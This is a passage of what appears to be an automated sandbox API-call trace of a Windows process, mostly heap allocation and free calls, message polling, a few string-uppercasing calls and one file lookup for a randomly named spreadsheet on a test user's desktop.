(HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77cd8 [0090.295] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9598 [0090.295] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71fe8 [0090.295] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9598 | out: hHeap=0x2af0000) returned 1 [0090.295] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77da0 [0090.295] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa94d8 [0090.295] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de40 [0090.295] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0090.295] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72028 [0090.295] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72098 [0090.295] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9430 [0090.295] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa95b0 [0090.295] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a720e8 [0090.295] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9448 [0090.295] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a720e8 | out: hHeap=0x2af0000) returned 1 [0090.295] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a720e8 [0090.295] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77dc8 [0090.295] CharUpperBuffW (in: lpsz="SSA2100602512", cchLength=0xd | out: lpsz="SSA2100602512") returned 0xd [0090.295] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77dc8 | out: hHeap=0x2af0000) returned 1 [0090.296] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a720e8 | out: hHeap=0x2af0000) returned 1 [0090.296] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9448 | out: hHeap=0x2af0000) returned 1 [0090.296] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa95b0 | out: hHeap=0x2af0000) returned 1 [0090.296] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9430 | out: hHeap=0x2af0000) returned 1 [0090.296] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72098 | out: hHeap=0x2af0000) returned 1 [0090.296] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72028 | out: hHeap=0x2af0000) returned 1 [0090.296] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5eb80 [0090.296] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0090.296] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5eb80 | out: hHeap=0x2af0000) returned 1 [0090.296] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0090.296] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9520 [0090.296] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72028 [0090.296] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9520 | out: hHeap=0x2af0000) returned 1 [0090.296] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77af8 [0090.296] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9520 [0090.296] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9430 [0090.296] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a720e8 [0090.296] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d28 [0090.296] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9610 [0090.296] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72098 [0090.296] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9610 | out: hHeap=0x2af0000) returned 1 [0090.296] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77dc8 [0090.296] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9448 [0090.296] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9460 [0090.296] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9520 | out: hHeap=0x2af0000) returned 1 [0090.296] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9520 [0090.296] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9598 [0090.296] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72708 [0090.296] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e18 [0090.296] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9478 [0090.296] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72718 [0090.296] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9478 | out: hHeap=0x2af0000) returned 1 [0090.297] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77df0 [0090.297] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9538 [0090.297] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9610 [0090.297] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77af8 | out: hHeap=0x2af0000) returned 1 [0090.297] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72028 | out: hHeap=0x2af0000) returned 1 [0090.297] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9520 | out: hHeap=0x2af0000) returned 1 [0090.297] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0090.297] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9568 [0090.297] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72028 [0090.297] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9568 | out: hHeap=0x2af0000) returned 1 [0090.297] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77a80 [0090.297] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9520 [0090.297] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9568 [0090.297] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72778 [0090.297] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77bc0 [0090.297] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa95b0 [0090.297] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72628 [0090.297] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa95b0 | out: hHeap=0x2af0000) returned 1 [0090.297] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b70 [0090.297] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9478 [0090.297] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa95b0 [0090.297] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72738 [0090.297] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9520 | out: hHeap=0x2af0000) returned 1 [0090.297] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa95e0 [0090.297] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9520 [0090.297] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72648 [0090.297] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9700 [0090.297] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72648 | out: hHeap=0x2af0000) returned 1 [0090.297] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9700 | out: hHeap=0x2af0000) returned 1 [0090.297] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9520 | out: hHeap=0x2af0000) returned 1 [0090.297] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa95e0 | out: hHeap=0x2af0000) returned 1 [0090.298] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72738 | out: hHeap=0x2af0000) returned 1 [0090.298] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9568 | out: hHeap=0x2af0000) returned 1 [0090.298] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | out: hHeap=0x2af0000) returned 1 [0090.298] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa95b0 | out: hHeap=0x2af0000) returned 1 [0090.298] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9568 [0090.298] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9520 [0090.298] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72648 [0090.298] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77aa8 [0090.298] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa95b0 [0090.298] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72698 [0090.298] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa95b0 | out: hHeap=0x2af0000) returned 1 [0090.298] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e40 [0090.298] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa95b0 [0090.298] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa95e0 [0090.298] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72738 [0090.298] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9568 | out: hHeap=0x2af0000) returned 1 [0090.298] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72738 | out: hHeap=0x2af0000) returned 1 [0090.298] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9520 | out: hHeap=0x2af0000) returned 1 [0090.298] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72648 | out: hHeap=0x2af0000) returned 1 [0090.298] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa95e0 | out: hHeap=0x2af0000) returned 1 [0090.298] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77a80 | out: hHeap=0x2af0000) returned 1 [0090.298] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72028 | out: hHeap=0x2af0000) returned 1 [0090.298] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0090.298] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9520 [0090.298] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72028 [0090.298] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9520 | out: hHeap=0x2af0000) returned 1 [0090.298] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e68 [0090.298] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9520 [0090.298] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9568 [0090.298] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72738 [0090.298] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77eb8 [0090.299] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa95e0 [0090.299] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72778 [0090.299] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa95e0 | out: hHeap=0x2af0000) returned 1 [0090.299] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f58 [0090.299] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa95e0 [0090.299] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9778 [0090.299] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e68 | out: hHeap=0x2af0000) returned 1 [0090.299] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72028 | out: hHeap=0x2af0000) returned 1 [0090.299] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9520 | out: hHeap=0x2af0000) returned 1 [0090.299] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0090.299] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9520 [0090.299] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72028 [0090.299] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9520 | out: hHeap=0x2af0000) returned 1 [0090.299] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e68 [0090.299] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9520 [0090.299] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9670 [0090.299] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72748 [0090.299] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ee0 [0090.299] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9688 [0090.299] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72648 [0090.299] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9688 | out: hHeap=0x2af0000) returned 1 [0090.300] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77a80 [0090.300] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9688 [0090.300] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa96a0 [0090.300] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a728f8 [0090.300] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9520 | out: hHeap=0x2af0000) returned 1 [0090.300] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9520 [0090.300] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9790 [0090.300] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72b08 [0090.300] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa96b8 [0090.300] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b08 | out: hHeap=0x2af0000) returned 1 [0090.300] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop/eacUdxJuUDfuA061.xls", lpFindFileData=0x8cf170 | out: lpFindFileData=0x8cf170*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67baf930, ftCreationTime.dwHighDateTime=0x1d5d160, ftLastAccessTime.dwLowDateTime=0xc1284a30, ftLastAccessTime.dwHighDateTime=0x1d5d382, ftLastWriteTime.dwLowDateTime=0xc1284a30, ftLastWriteTime.dwHighDateTime=0x1d5d382, nFileSizeHigh=0x0, nFileSizeLow=0x13ea7, dwReserved0=0x0, dwReserved1=0x0, cFileName="eacUdxJuUDfuA061.xls", cAlternateFileName="EACUDX~1.XLS")) returned 0x9a4180 [0090.300] FindClose (in: hFindFile=0x9a4180 | out: hFindFile=0x9a4180) returned 1 [0090.300] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96b8 | out: hHeap=0x2af0000) returned 1 [0090.300] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9790 | out: hHeap=0x2af0000) returned 1 [0090.300] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9520 | out: hHeap=0x2af0000) returned 1 [0090.300] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a728f8 | out: hHeap=0x2af0000) returned 1 [0090.300] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9670 | out: hHeap=0x2af0000) returned 1 [0090.300] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0090.300] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96a0 | out: hHeap=0x2af0000) returned 1 [0090.300] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e68 | out: hHeap=0x2af0000) returned 1 [0090.300] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72028 | out: hHeap=0x2af0000) returned 1 [0090.300] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0090.300] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9670 [0090.300] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72028 [0090.300] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9670 | out: hHeap=0x2af0000) returned 1 [0090.300] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ad0 [0090.301] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9850 [0090.301] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9670 [0090.301] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72748 [0090.301] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77af8 [0090.301] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa96a0 [0090.301] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a728f8 [0090.301] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96a0 | out: hHeap=0x2af0000) returned 1 [0090.301] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b20 [0090.301] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa96a0 [0090.301] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa96b8 [0090.301] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a08 [0090.301] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9850 | out: hHeap=0x2af0000) returned 1 [0090.301] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa96e8 [0090.301] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9718 [0090.301] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72b28 [0090.301] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9790 [0090.301] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b28 | out: hHeap=0x2af0000) returned 1 [0090.301] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9790 | out: hHeap=0x2af0000) returned 1 [0090.301] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9718 | out: hHeap=0x2af0000) returned 1 [0090.301] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96e8 | out: hHeap=0x2af0000) returned 1 [0090.301] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a08 | out: hHeap=0x2af0000) returned 1 [0090.301] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9670 | out: hHeap=0x2af0000) returned 1 [0090.301] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0090.301] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96b8 | out: hHeap=0x2af0000) returned 1 [0090.301] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77ad0 | out: hHeap=0x2af0000) returned 1 [0090.301] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72028 | out: hHeap=0x2af0000) returned 1 [0090.301] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0090.301] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77be8 [0090.301] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72028 [0090.301] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0090.301] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77be8 | out: hHeap=0x2af0000) returned 1 [0090.302] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72028 | out: hHeap=0x2af0000) returned 1 [0090.302] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0090.302] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a08 | out: hHeap=0x2af0000) returned 1 [0090.302] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0090.302] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e68 | out: hHeap=0x2af0000) returned 1 [0090.302] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a08 | out: hHeap=0x2af0000) returned 1 [0090.302] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9808 | out: hHeap=0x2af0000) returned 1 [0090.302] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9790 | out: hHeap=0x2af0000) returned 1 [0090.302] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96e8 | out: hHeap=0x2af0000) returned 1 [0090.302] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0090.302] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72028 | out: hHeap=0x2af0000) returned 1 [0090.302] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0090.302] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5eb00 | out: hHeap=0x2af0000) returned 1 [0090.302] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0090.302] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0090.302] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77b48 | out: hHeap=0x2af0000) returned 1 [0090.302] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0090.302] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0090.302] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a38 | out: hHeap=0x2af0000) returned 1 [0090.302] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0090.302] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c88 | out: hHeap=0x2af0000) returned 1 [0090.302] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b08 | out: hHeap=0x2af0000) returned 1 [0090.302] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9808 | out: hHeap=0x2af0000) returned 1 [0090.302] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96e8 | out: hHeap=0x2af0000) returned 1 [0090.302] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96b8 | out: hHeap=0x2af0000) returned 1 [0090.302] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a08 | out: hHeap=0x2af0000) returned 1 [0090.302] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0090.302] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0090.303] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e700 | out: hHeap=0x2af0000) returned 1 [0090.303] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0090.303] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a08 | out: hHeap=0x2af0000) returned 1 [0090.303] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9700 | out: hHeap=0x2af0000) returned 1 [0090.303] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96e8 | out: hHeap=0x2af0000) returned 1 [0090.303] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96b8 | out: hHeap=0x2af0000) returned 1 [0090.303] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b08 | out: hHeap=0x2af0000) returned 1 [0090.303] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | 